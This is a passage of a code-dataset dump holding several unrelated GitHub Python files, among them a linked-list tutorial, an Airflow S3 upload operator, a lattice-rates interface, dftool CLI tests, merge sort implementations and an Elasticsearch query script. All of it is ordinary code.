(x1, y1), (x2, y2), (0,255,0), 20) #top left to bottom left\r\n cv2.line(img, (x2, y2), (x3, y3), (0,255,0), 20) #bottom left to bottom right\r\n cv2.line(img, (x3, y3), (x0, y0), (0,255,0), 20) #bottom right to top right\r\n cv2.putText(img, str(tag.getId()), (int(tag.getCenter().x), int(tag.getCenter().y)), cv2.FONT_HERSHEY_TRIPLEX, 1, (0, 0, 255)) # ID in center\r\n\r\n if debug_ntt.get() == True:\r\n outputStream.putFrame(img) # send to dashboard\r\n\r\nmain()","repo_name":"FoleyFreeze/2023-FRC-Vision","sub_path":"vision.py","file_name":"vision.py","file_ext":"py","file_size_in_byte":8401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11889573008","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n \n def print_list(self):\n 
cur_node = self.head\n \n while cur_node:\n print(cur_node.data)\n cur_node = cur_node.next\n \n def append(self, data):\n #create memory\n new_node = Node(data)\n \n #insertion in an empty linked list\n if self.head is None:\n self.head = new_node\n return \n \n #insertion at the end of the linked list\n last_node = self.head\n while last_node.next is not None:\n last_node = last_node.next\n \n last_node.next = new_node\n \n def prepend(self, data):\n #create memory\n new_node = Node(data)\n \n #prepend inserts data in the beginning\n new_node.next = self.head #new node points to the head\n self.head = new_node #now new node is the head node\n \n \nif __name__ == \"__main__\":\n llist = LinkedList()\n\n llist.append(\"A\")\n llist.append(\"B\")\n llist.append(\"C\")\n llist.prepend(\"D\")\n\n llist.print_list()","repo_name":"bipulhstu/Data-Structures-and-Algorithms-Through-Python-in-Depth","sub_path":"1. Single Linked List/4. Linked List Insertion (prepend).py","file_name":"4. Linked List Insertion (prepend).py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"26894648494","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nimport re\nimport sys\n\ndef parseArgs():\n p = argparse.ArgumentParser(description =\n \"Work out Java class depencies\")\n p.add_argument(\"--build-dir\", \"-b\", type = str, metavar = \"DIR\",\n help = \"Set the build directory\", default = \"\")\n p.add_argument(\"infile\", metavar = \"FILENAME\", type = str)\n args = p.parse_args()\n return args\n\n# Search the source file for references to other classes in\n# the same package. Return a list of fully-specified class names.\ndef getIncludes(lines):\n deps = []\n regexp = re.compile(r'^\\s*\\\\include\\{(\\S+)\\}')\n for line in lines:\n m = regexp.match(line)\n if m:\n deps.append(m.group(1))\n return deps\n\n# Convert extensionless includes into real file names.\ndef findFiles(deps):\n ret = []\n for d in deps:\n if len(os.path.splitext(d)[1]) == 0:\n d = d + \".tex\"\n ret.append(d)\n return ret\n\ndef getDeps(fname):\n fp = open(fname, \"r\")\n lines = fp.readlines()\n fp.close()\n\n includes = getIncludes(lines)\n includes = findFiles(includes)\n\n return includes\n\ndef main():\n args = parseArgs()\n deps = getDeps(args.infile)\n for i in deps:\n print(i)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chrisdiamand/buildsystem","sub_path":"latexdep.py","file_name":"latexdep.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29592463007","text":"\"\"\"Add {PROJECT_ROOT}. 
to PYTHONPATH\n\nUsage:\nimport this module before import any intra-project modules\ne.g \n import _init_paths\n from datasets import dataset\n\"\"\" \n\nimport os.path as osp\nimport sys\n\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n\nproject_root = osp.abspath(osp.dirname(osp.dirname(__file__)))\n\n# Add project dir to PYTHONPATH\nadd_path(project_root)","repo_name":"allpan3/multi-concept-MNIST","sub_path":"tools/_init_paths.py","file_name":"_init_paths.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"797990153","text":"## file_to_s3.py => operator\n\nimport logging\nimport pandas as pd\nimport json\nimport boto3\n\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nfrom airflow.models import Variable\nfrom airflow.hooks.base import BaseHook\n\nfrom airflow.operators.python import get_current_context\n\n\n\"\"\"The stage operator is expected to be able to load any JSON formatted files from S3 to Amazon Redshift.\nThe operator creates and runs a SQL COPY statement based on the parameters provided.\nThe operator's parameters should specify where in S3 the file is loaded and what is the target table.\n\nThe parameters should be used to distinguish between JSON file.\nAnother important requirement of the stage operator is containing a templated field that allows it to load\ntimestamped files from S3 based on the execution time and run backfills.\"\"\"\n\nclass FileToS3Operator(BaseOperator):\n template_fields = ('link_file','file_name',)\n\n @apply_defaults\n def __init__(self,\n aws_credentials=\"\",\n bucket_name=\"\",\n link_file=\"\",\n data_type=\"\",\n file_name=\"\",\n link_args={},\n *args, **kwargs):\n\n super(FileToS3Operator, self).__init__(*args, **kwargs)\n self.aws_credentials=aws_credentials\n self.bucket_name=bucket_name\n self.link_file=link_file\n self.data_type=data_type\n self.file_name=file_name\n\n\n def execute(self, context):\n logging.info(f\"Parameters: {self.aws_credentials}, {self.bucket_name}, {self.link_file}, {self.data_type}, {self.file_name}\")\n connection = BaseHook.get_connection(self.aws_credentials)\n secret_key = connection.password # This is a getter that returns the unencrypted pass\n access_key = connection.login # This is a getter that returns the unencrypted login\n\n bucket = Variable.get(self.bucket_name)\n row = 0\n\n link = self.link_file\n logging.info(link)\n\n if self.data_type == 'json':\n df = pd.read_json(link)\n row, col = df.shape\n\n elif self.data_type == 'csv':\n df = pd.read_csv(link, sep=\";\", decimal=\",\")\n row, col = df.shape\n \n elif self.data_type == 'csv-l':\n df = pd.read_csv(link, sep=\";\", decimal=\",\", header=0, encoding='latin-1')\n row, col = df.shape\n \n elif self.data_type == 'csv-h':\n headers = {\"User-Agent\": \"pandas\"}\n df = pd.read_csv(link, sep=\";\", storage_options=headers, decimal=\",\")\n row, col = df.shape\n\n elif self.data_type == 'xlxs':\n df = pd.read_excel(link)\n row, col = df.shape\n\n elif self.data_type == 'xcom':\n dict_data = context['task_instance'].xcom_pull(key=link)\n df = pd.DataFrame.from_dict(dict_data)\n row, col = df.shape\n\n else:\n raise ValueError(f\"Data type {self.data_type} is not in the scope\")\n\n\n if row == 0:\n logging.error(f\"Read file from {link} result in 0 row\")\n else:\n logging.info(f\"Read file from {link} \\n row = {row}\")\n\n file_json = 
df.to_json(orient=\"records\")\n\n#Creating Session With Boto3\n session = boto3.Session(\n aws_access_key_id=access_key,\n aws_secret_access_key=secret_key,\n region_name='us-west-2'\n )\n\n#Creating S3 Resource From the Session.\n s3 = session.resource('s3')\n s3_object = s3.Object(bucket, self.file_name)\n s3_insert = s3_object.put(Body=file_json)\n\n result = s3_insert.get('ResponseMetadata')\n\n if result.get('HTTPStatusCode') == 200:\n logging.info(f'File Uploaded Successfully {self.file_name}')\n else:\n logging.error(f'File Not Uploaded {self.file_name}')\n","repo_name":"sandramalaquias/Data-Engineering-Fuel-Price","sub_path":"DAGS/dags/operators/file_to_s3.py","file_name":"file_to_s3.py","file_ext":"py","file_size_in_byte":3804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43911327560","text":"\"\"\" File that contains the Rates interface.\n\"\"\"\n\n# Imports\nimport copy as cp\nimport numpy as np\nfrom abc import ABCMeta, abstractmethod\n\n# Classes\nfrom Classes import lattice as lt\n\n\nclass Rates(metaclass=ABCMeta):\n \"\"\" Abstract class that allows to quickly create rates classes for specific\n systems.\n\n :var self.cell_moves: The number of cells that have a possibility to\n move within the lattice, i.e., the cells whose rates are not zero.\n\n :var self.dimensionality: The dimensionality of the lattice.\n\n :var self.general_rates: List that keeps track of the general rates of\n the system, i.e., the cells whose rates are non-zero.\n\n :var self.lattice: The lattice where the cells are.\n\n :var self.moves_per_cell: The number of moves per cell, that are used to\n determine the rates of each individual cell.\n \"\"\"\n\n # --------------------------------------------------------------------------\n # Getter/Setter/Deleter Methods\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def cell_moves(self):\n \"\"\" Gets a deep copy of the number of cell moves available.\n\n :returns A deep copy of the number of cell moves available.\n \"\"\"\n\n return cp.deepcopy(self.__cell_moves)\n\n @cell_moves.setter\n @abstractmethod\n def cell_moves(self, cell_moves):\n \"\"\" Sets the number of cells that have a non-zero rate.\n\n :var cell_moves: The new number of cells that have a non-zero rate.\n \"\"\"\n\n # Check that the value is consistent.\n if np.int32(cell_moves) < 0:\n raise ValueError(\"The number of moves must always be positive or zero.\")\n\n self.__cell_moves = cp.deepcopy(np.int32(cell_moves))\n\n @cell_moves.deleter\n @abstractmethod\n def cell_moves(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The cell_moves attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def dimensionality(self):\n \"\"\" Gets a deep copy of the dimensionality of the space that is being used.\n\n :returns A deep copy of the dimensionality of the space that is being used.\n \"\"\"\n\n return cp.deepcopy(self.__dimensionality)\n\n @dimensionality.setter\n @abstractmethod\n def dimensionality(self, _):\n \"\"\" Sets the dimensionality to that of the lattice being used.\n\n :var _: This variable is never used.\n \"\"\"\n\n self.__dimensionality = cp.deepcopy(self.lattice.dimensionality)\n\n @dimensionality.deleter\n @abstractmethod\n def dimensionality(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise 
AttributeError(\"The dimensionality attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def general_rates(self):\n \"\"\" Gets the general rates of the system.\n\n :returns The general rates of the system.\n \"\"\"\n\n return self.__general_rates\n\n @general_rates.setter\n @abstractmethod\n def general_rates(self, general_rates):\n \"\"\" Sets the general rates of the system.\n\n :var _: This variable is never used.\n \"\"\"\n\n try:\n self.__general_rates\n\n except AttributeError:\n # Create an array where the rates of each cell can be stored.\n rates = np.zeros(self.lattice.lattice_length, dtype=np.double)\n\n # Create an array where the id of each cell is stored.\n ids = np.array([np.int32(-1) for _ in range(self.lattice.lattice_length)], dtype=np.int32)\n\n self.__general_rates = [rates, ids]\n\n @general_rates.deleter\n @abstractmethod\n def general_rates(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The general_rates attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def lattice(self):\n \"\"\" Returns the lattice that is being used.\n\n :returns The lattice that is being used.\n \"\"\"\n\n return self.__lattice\n\n @lattice.setter\n @abstractmethod\n def lattice(self, lattice):\n \"\"\" Sets the lattice to be used.\n\n :lattice: The lattice to be used, can only be done once.\n \"\"\"\n\n try:\n self.__lattice\n\n except AttributeError:\n # Check that the object is a lattice.\n if not type(lattice) == lt.Lattice:\n raise TypeError(\"The assigned object must be a lattice.\")\n\n # Set the lattice.\n self.__lattice = lattice\n\n @lattice.deleter\n @abstractmethod\n def lattice(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The lattice attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n\n @property\n @abstractmethod\n def moves_per_cell(self):\n \"\"\" Returns a deep copy of the number of moves per cell.\n\n :returns A deep copy of the number of moves per cell.\n \"\"\"\n\n return cp.deepcopy(self.__moves_per_cell)\n\n @moves_per_cell.setter\n @abstractmethod\n def moves_per_cell(self, moves_per_cell):\n \"\"\" Sets the lattice to be used.\n\n :lattice: The lattice to be used, can only be done once.\n \"\"\"\n\n try:\n self.__moves_per_cell\n\n except AttributeError:\n # Check that the moves per cell are greater than or equal to zero.\n if np.int32(moves_per_cell) < 0:\n raise TypeError(\"The moves per cell must be greater than zero.\")\n\n # Set the moves per cell.\n self.__moves_per_cell = cp.deepcopy(np.int32(moves_per_cell))\n\n @moves_per_cell.deleter\n @abstractmethod\n def moves_per_cell(self):\n \"\"\" This attribute should never be deleted.\n \"\"\"\n\n raise AttributeError(\"The nearest_neighbor_calculator attribute should never be deleted.\")\n\n # --------------------------------------------------------------------------\n # Set Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def set_cell_rates(self, cell_indexes):\n \"\"\" Sets the rates of the given cells.\n\n :var cell_indexes: The indexes of the cells whose rates are to be set.\n \"\"\"\n pass\n\n @abstractmethod\n def set_single_cell_rates(self, cell_index):\n \"\"\" Sets the rates of the given 
cells.\n\n :var cells: The indexes of the cells whose rates are to be set.\n \"\"\"\n pass\n\n # --------------------------------------------------------------------------\n # Add/Delete Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _add_cell(self, cell_indentifier):\n \"\"\" Adds an cell to the general rates list, provided the total rate of\n the cell is greater than zero.\n\n :var cell_indentifier: The cell id or index that is to be added to\n the general rates list.\n \"\"\"\n\n # Obtain the desired cell.\n tmp_cell = self.lattice.get_cell(cell_indentifier)\n\n # Do not bother with cells that are already in the list or their rate is zero.\n if not tmp_cell.special_id < 0 or not tmp_cell.get_total_rate() > np.double(0.0):\n return\n\n # Add the cell at the end of the array and set the special id.\n self.general_rates[1][self.cell_moves] = cp.deepcopy(self.lattice.get_id(cell_indentifier))\n tmp_cell.special_id = cp.deepcopy(self.cell_moves)\n\n # Remember to add one to the counter.\n self.cell_moves += 1\n\n if self.cell_moves > self.lattice.lattice_length:\n raise ValueError(\"The cell_moves counter must never exceed the lattice length.\")\n\n @abstractmethod\n def _delete_cell(self, cell_indentifier):\n \"\"\" Deletes a cell from the general rates list, provided it is in the\n list.\n\n :var cell_cell_indentifier: The cell that is to be deleted from the general\n rates list.\n \"\"\"\n\n # Obtain the desired cell.\n tmp_cell = self.lattice.get_cell(cell_indentifier)\n\n # Do not bother with cells that are not in the list or an empty list.\n if tmp_cell.special_id < 0 or self.cell_moves == 0:\n return\n\n # Remove the cell from the list.\n special_id_tmp = cp.deepcopy(tmp_cell.special_id)\n\n # Swap the special_id to the correct one.\n self.general_rates[1][special_id_tmp] = cp.deepcopy(self.general_rates[1][self.cell_moves - 1])\n self.lattice.get_cell(self.general_rates[1][special_id_tmp]).special_id = cp.deepcopy(special_id_tmp)\n self.general_rates[1][self.cell_moves - 1] = np.int32(-1)\n\n # Set the special id of the last one to zero.\n tmp_cell.special_id = np.int32(-1)\n\n # Remember to subtract one to the counter.\n self.cell_moves -= 1\n\n if self.cell_moves < 0:\n raise ValueError(\"The cell_moves counter must never be below zero.\")\n\n # --------------------------------------------------------------------------\n # Initialization Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _initialize_rates(self):\n \"\"\" Initializes the general rates list/array and the individual rates\n of each cell of the lattice.\n \"\"\"\n\n # Set the rates of each cell to zero.\n for i in range(self.lattice.lattice_length):\n rate_list = np.zeros(self.moves_per_cell, dtype=np.double)\n self.lattice.cell_lattice[i].rates = rate_list\n\n @abstractmethod\n def _initialize_system(self):\n \"\"\" Initializes the general rates list/array and the individual rates of\n each cell of the lattice.\n \"\"\"\n\n # Initialize the rates of the system.\n self._initialize_rates()\n\n # --------------------------------------------------------------------------\n # Retrieve Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _retrieve_indexes_in_lattice(self, indexes):\n \"\"\" Retrieves the cell indexes that are in the lattice from a set of\n indexes.\n\n :var indexes: A vector index that represents a cell within the\n 
lattice.\n\n :returns A vector that contains the resulting indexes WITHIN the\n lattice.\n \"\"\"\n\n # Set the list.\n indexes_in_lattice = []\n\n # Evaluate the indexes.\n for i, index0 in enumerate(indexes):\n # Add the index if it is valid.\n if self.lattice.get_valid_index(index0):\n\n # Only use non-repeated indexes.\n in_vector = False\n for index1 in indexes_in_lattice:\n in_vector = in_vector or np.array_equal(index0, index1)\n if in_vector:\n break\n\n # Only add non-repeated indexes.\n if not in_vector:\n indexes_in_lattice.append(cp.deepcopy(index0))\n\n return indexes_in_lattice\n\n # --------------------------------------------------------------------------\n # Update Rates Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def update_rates(self, cell_indexes):\n \"\"\" Updates the rates and general rates of the given cell indexes, after\n filtering them.\n\n :var cell_indexes: The indexes of the cells that are to be updated.\n \"\"\"\n\n # Retrieve the indexes that are in the lattice.\n list_indexes = self._retrieve_indexes_in_lattice(cell_indexes)\n\n # Update the rates.\n self.set_cell_rates(list_indexes)\n\n # Update the cells in the general rates array.\n for index in list_indexes:\n self._delete_cell(index)\n self._add_cell(index)\n\n # --------------------------------------------------------------------------\n # Validation Methods\n # --------------------------------------------------------------------------\n\n @abstractmethod\n def _validates_correct_list(self, list_to_validate):\n \"\"\" Validates if the list_to_validate is a list that contains numpy\n arrays of integer numbers with the correct dimensionality and\n integer indexes.\n\n var: list_to_validate: The list that needs validation.\n \"\"\"\n\n # Validate the list has non-zero length.\n if not isinstance(list_to_validate, list) or len(list_to_validate) < 1:\n raise ValueError(\"The list_to_validate must be a list and contain at least one value.\")\n\n # Validate each element of the list_to_validate is the correct\n # dimensionality and the types are np.int32 elements.\n for elem in list_to_validate:\n validate = len(elem) == self.dimensionality\n validate = validate and isinstance(elem, (type(np.array([]))))\n validate = validate and all(list(map(lambda x: isinstance(x, np.int32), elem)))\n\n if not validate:\n str0 = \"The elements of the list_to_validate must be numpy \"\n str0 += \"arrays of length 3, with integers.\"\n raise ValueError(str0)\n","repo_name":"AndresGarciaEscovar/Python-KMC","sub_path":"Code/Classes/Interfaces/ratesinterface.py","file_name":"ratesinterface.py","file_ext":"py","file_size_in_byte":13760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71400796354","text":"import os\nimport subprocess\nimport time\nimport types\n\nimport brownie\nfrom enforce_typing import enforce_types\n\nfrom util import csvs, networkutil, oceanutil, oceantestutil\nfrom util.base18 import fromBase18, toBase18\nfrom util.constants import BROWNIE_PROJECT as B\n\naccounts, PREV, DISPENSE_ACCT = None, None, None\n\nCHAINID = networkutil.DEV_CHAINID\nADDRESS_FILE = networkutil.chainIdToAddressFile(networkutil.DEV_CHAINID)\nST = 0\n\n\n@enforce_types\ndef test_query(tmp_path):\n CSV_DIR = str(tmp_path)\n\n # insert fake inputs: info onto the chain\n oceantestutil.fillAccountsWithOCEAN()\n time.sleep(2)\n\n # insert fake inputs: rate csv file\n csvs.saveRateCsv(\"OCEAN\", 0.5, CSV_DIR)\n\n # main 
cmd\n FIN = \"latest\"\n NSAMP = 5\n\n cmd = f\"./dftool query {ST} {FIN} {NSAMP} {CSV_DIR} {CHAINID}\"\n os.system(cmd)\n\n # test result\n assert csvs.nftvolsCsvFilenames(CSV_DIR)\n assert csvs.symbolsCsvFilenames(CSV_DIR)\n\n\n@enforce_types\ndef test_getrate(tmp_path):\n # insert fake inputs:\n # \n\n # main cmd\n TOKEN_SYMBOL = \"OCEAN\"\n _ST = \"2022-01-01\"\n FIN = \"2022-02-02\"\n CSV_DIR = str(tmp_path)\n\n cmd = f\"./dftool getrate {TOKEN_SYMBOL} {_ST} {FIN} {CSV_DIR}\"\n os.system(cmd)\n\n # test result\n assert csvs.rateCsvFilenames(CSV_DIR)\n\n\n@enforce_types\ndef test_vebals(tmp_path):\n CSV_DIR = str(tmp_path)\n FIN = \"latest\"\n NSAMP = 100\n\n cmd = f\"./dftool vebals {ST} {FIN} {NSAMP} {CSV_DIR} {CHAINID}\"\n os.system(cmd)\n\n # test result\n vebals_csv = csvs.vebalsCsvFilename(CSV_DIR)\n assert os.path.exists(vebals_csv), \"vebals csv file not found\"\n\n # test without sampling\n cmd = f\"./dftool vebals {ST} {FIN} 1 {CSV_DIR} {CHAINID}\" # NSAMP=1\n os.system(cmd)\n\n # test result\n vebals_csv = csvs.vebalsCsvFilename(CSV_DIR, False)\n assert os.path.exists(vebals_csv), \"vebals_realtime csv not found\"\n\n\n@enforce_types\ndef test_allocations(tmp_path):\n CSV_DIR = str(tmp_path)\n FIN = \"latest\"\n NSAMP = 100\n\n cmd = f\"./dftool allocations {ST} {FIN} {NSAMP} {CSV_DIR} {CHAINID}\"\n os.system(cmd)\n\n # test result\n allocations_csv = csvs.allocationCsvFilename(CSV_DIR)\n assert os.path.exists(allocations_csv), \"allocations csv file not found\"\n\n # test without sampling\n cmd = f\"./dftool allocations {ST} {FIN} 1 {CSV_DIR} {CHAINID}\" # NSAMP=1\n os.system(cmd)\n\n # test result\n allocations_csv = csvs.allocationCsvFilename(CSV_DIR, False)\n assert os.path.exists(allocations_csv), \"allocations_realtime csv not found\"\n\n\n@enforce_types\ndef test_calc(tmp_path):\n CSV_DIR = str(tmp_path)\n OCEAN_addr = oceanutil.OCEAN_address()\n\n # insert fake csvs\n allocations = {CHAINID: {\"0xpool_addra\": {\"0xlp_addr1\": 1.0}}}\n csvs.saveAllocationCsv(allocations, CSV_DIR)\n\n nftvolts_at_chain = {OCEAN_addr: {\"0xpool_addra\": 1.0}}\n csvs.saveNftvolsCsv(nftvolts_at_chain, CSV_DIR, CHAINID)\n\n vebals = {\"0xlp_addr1\": 1.0}\n locked_amt = {\"0xlp_addr1\": 10.0}\n unlock_time = {\"0xlp_addr1\": 1}\n csvs.saveVebalsCsv(vebals, locked_amt, unlock_time, CSV_DIR)\n\n symbols_at_chain = {OCEAN_addr: \"OCEAN\"}\n csvs.saveSymbolsCsv(symbols_at_chain, CSV_DIR, CHAINID)\n\n csvs.saveRateCsv(\"OCEAN\", 0.50, CSV_DIR)\n\n # main cmd\n TOT_OCEAN = 1000.0\n cmd = f\"./dftool calc {CSV_DIR} {TOT_OCEAN}\"\n os.system(cmd)\n\n # test result\n rewards_csv = csvs.rewardsperlpCsvFilename(CSV_DIR, \"OCEAN\")\n assert os.path.exists(rewards_csv)\n\n\n@enforce_types\ndef test_dispense(tmp_path):\n # values used for inputs or main cmd\n global accounts\n accounts = brownie.network.accounts\n account1 = accounts[1]\n address1 = account1.address.lower()\n CSV_DIR = str(tmp_path)\n TOT_OCEAN = 1000.0\n\n # accounts[0] has OCEAN. 
Ensure that dispensing account has some\n global DISPENSE_ACCT\n OCEAN = oceanutil.OCEANtoken()\n OCEAN.transfer(DISPENSE_ACCT, toBase18(TOT_OCEAN), {\"from\": accounts[0]})\n assert fromBase18(OCEAN.balanceOf(DISPENSE_ACCT.address)) == TOT_OCEAN\n\n # insert fake inputs: rewards csv, new dfrewards.sol contract\n rewards = {CHAINID: {address1: TOT_OCEAN}}\n csvs.saveRewardsperlpCsv(rewards, CSV_DIR, \"OCEAN\")\n\n df_rewards = B.DFRewards.deploy({\"from\": accounts[0]})\n\n # main command\n CSV_DIR = str(tmp_path)\n DFREWARDS_ADDR = df_rewards.address\n TOKEN_ADDR = oceanutil.OCEAN_address()\n\n cmd = f\"./dftool dispense {CSV_DIR} {CHAINID} {DFREWARDS_ADDR} {TOKEN_ADDR}\"\n os.system(cmd)\n\n # test result\n assert df_rewards.claimable(address1, OCEAN.address)\n\n\n@enforce_types\ndef test_manyrandom():\n cmd = f\"./dftool manyrandom {networkutil.DEV_CHAINID}\"\n output_s = \"\"\n with subprocess.Popen(\n cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as proc:\n while proc.poll() is None:\n output_s += proc.stdout.readline().decode(\"ascii\")\n return_code = proc.wait()\n assert return_code == 0, f\"Error. \\n{output_s}\"\n\n\n@enforce_types\ndef test_noarg_commands():\n # Test commands that have no args. They're usually help commands;\n # sometimes they do the main work (eg compile).\n argv1s = [\n \"\",\n \"query\",\n \"getrate\",\n \"calc\",\n \"dispense\",\n \"querymany\",\n \"compile\",\n \"manyrandom\",\n \"newdfrewards\",\n \"mine\",\n \"newacct\",\n \"newtoken\",\n \"acctinfo\",\n \"chaininfo\",\n ]\n for argv1 in argv1s:\n print(f\"Test dftool {argv1}\")\n cmd = f\"./dftool {argv1}\"\n\n output_s = \"\"\n with subprocess.Popen(\n cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT\n ) as proc:\n while proc.poll() is None:\n output_s += proc.stdout.readline().decode(\"ascii\")\n\n return_code = proc.wait()\n assert return_code == 0, f\"'dftool {argv1}' failed. 
\\n{output_s}\"\n\n\n@enforce_types\ndef test_checkpoint_feedistributor():\n feeDistributor = oceanutil.FeeDistributor()\n timecursor_before = feeDistributor.time_cursor()\n brownie.network.chain.sleep(60 * 60 * 24 * 7)\n brownie.network.chain.mine()\n cmd = f\"./dftool checkpoint_feedist {CHAINID}\"\n os.system(cmd)\n\n timecursor_after = feeDistributor.time_cursor()\n\n assert timecursor_after > timecursor_before\n\n\n@enforce_types\ndef setup_function():\n global accounts, PREV, DISPENSE_ACCT, ST\n\n networkutil.connect(CHAINID)\n ST = len(brownie.network.chain)\n accounts = brownie.network.accounts\n oceanutil.recordDevDeployedContracts()\n oceantestutil.fillAccountsWithOCEAN()\n\n PREV = types.SimpleNamespace()\n\n PREV.DFTOOL_KEY = os.environ.get(\"DFTOOL_KEY\")\n DISPENSE_ACCT = brownie.network.accounts.add()\n os.environ[\"DFTOOL_KEY\"] = DISPENSE_ACCT.private_key\n\n PREV.ADDRESS_FILE = os.environ.get(\"ADDRESS_FILE\")\n os.environ[\"ADDRESS_FILE\"] = networkutil.chainIdToAddressFile(CHAINID)\n\n PREV.SUBGRAPH_URI = os.environ.get(\"SUBGRAPH_URI\")\n os.environ[\"SUBGRAPH_URI\"] = networkutil.chainIdToSubgraphUri(CHAINID)\n\n os.environ[\"SECRET_SEED\"] = \"1234\"\n\n OCEAN = oceanutil.OCEANtoken()\n tups = oceantestutil.randomCreateDataNFTWithFREs(8, OCEAN, accounts)\n oceantestutil.randomConsumeFREs(tups, OCEAN)\n oceantestutil.randomLockAndAllocate(tups)\n\n brownie.network.chain.mine(20)\n brownie.network.chain.sleep(20)\n brownie.network.chain.mine(20)\n time.sleep(2)\n\n\n@enforce_types\ndef teardown_function():\n networkutil.disconnect()\n\n global PREV\n\n if PREV.DFTOOL_KEY is None:\n del os.environ[\"DFTOOL_KEY\"]\n else:\n os.environ[\"DFTOOL_KEY\"] = PREV.DFTOOL_KEY\n\n if PREV.ADDRESS_FILE is None:\n del os.environ[\"ADDRESS_FILE\"]\n else:\n os.environ[\"ADDRESS_FILE\"] = PREV.ADDRESS_FILE\n\n if PREV.SUBGRAPH_URI is None:\n del os.environ[\"SUBGRAPH_URI\"]\n else:\n os.environ[\"SUBGRAPH_URI\"] = PREV.SUBGRAPH_URI\n","repo_name":"trangnv/df-strat","sub_path":"util/test/test_dftool.py","file_name":"test_dftool.py","file_ext":"py","file_size_in_byte":7906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10071415458","text":"import random\n\n\ndef mergeSort(elems):\n mergeHelper(elems, 0, len(elems) - 1)\n\n\ndef mergeHelper(elems, start, end):\n if start >= end:\n return\n\n mid = (start + end) // 2\n mergeHelper(elems, start, mid)\n mergeHelper(elems, mid + 1, end)\n merge(elems, start, mid, end)\n\n\ndef merge(elems, start, mid, end):\n aux = []\n l, r = start, mid + 1\n while l <= mid and r <= end:\n if elems[l] <= elems[r]:\n aux.append(elems[l])\n l += 1\n else:\n aux.append(elems[r])\n r += 1\n while l <= mid:\n aux.append(elems[l])\n l += 1\n\n while r <= end:\n aux.append(elems[r])\n r += 1\n\n for x in range(len(aux)):\n elems[x+start] = aux[x]\n\n\n# test = [random.randint(0, 9) for x in range(10)]\n# print(test)\n# mergeSort(test)\n# print(test)\n\n\ndef mergeOneParam(elems):\n if len(elems) > 1:\n # mid\n mid = len(elems) // 2\n\n # copy left\n l = elems[:mid]\n\n # copy right\n r = elems[mid:]\n\n mergeOneParam(l)\n mergeOneParam(r)\n\n li = ri = ei = 0\n\n while li < len(l) and ri < len(r):\n if l[li] <= r[ri]:\n elems[ei] = l[li]\n li += 1\n else:\n elems[ei] = r[ri]\n ri += 1\n ei += 1\n\n while li < len(l):\n elems[ei] = l[li]\n li += 1\n ei += 1\n\n while ri < len(r):\n elems[ei] = r[ri]\n ri += 1\n ei += 1\n\n\n# test = [random.randint(0, 9) for x in range(10)]\n# print(test)\n# 
mergeOneParam(test)\n# print(test)\n\n\ndef mergeBottomUp(A):\n    subsize = 1\n    while subsize < len(A):\n        x = 0\n        while x < len(A):\n            print('in merge portion')\n            print(x)\n            start = x\n            mid = x+subsize - 1\n\n            if mid >= len(A) - 1:\n                print('mid is past or at end of array')\n                break\n            end = start + 2 * subsize - 1\n            if end >= len(A):\n                end = len(A) - 1\n            merge(A, start, mid, end)\n            x = end + 1\n        subsize *= 2\n\n\nprint('merge bottom up')\n\ntest = [random.randint(0, 9) for x in range(10)]\nprint(test)\nmergeBottomUp(test)\nprint(test)\n","repo_name":"xavierpjb/AlgoDataStruct","sub_path":"python/IkAlgs/sorting/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
{"seq_id":"2238770167","text":"from elasticsearch import Elasticsearch\n\ntry:\n    es = Elasticsearch([{\"host\":\"localhost\",\"port\":9200}])\n    print(es)\n    try:\n        print(es.search(index=\"elasticsearch\", body={\"_source\": [\"username\", \"starttime\"], \"query\": {\"range\": {\"starttime\": {\"gt\":\"2019-10-24T08:30:00.000Z\"}}}}))\n    except Exception:\n        print(\"Data not Found\")\nexcept Exception:\n    print(\"Connection not Established\")","repo_name":"Dewanshurahul/BridgeLabz_Mumbai","sub_path":"ElasticSearch/ElasticSearch_Task/late_commers.py","file_name":"late_commers.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
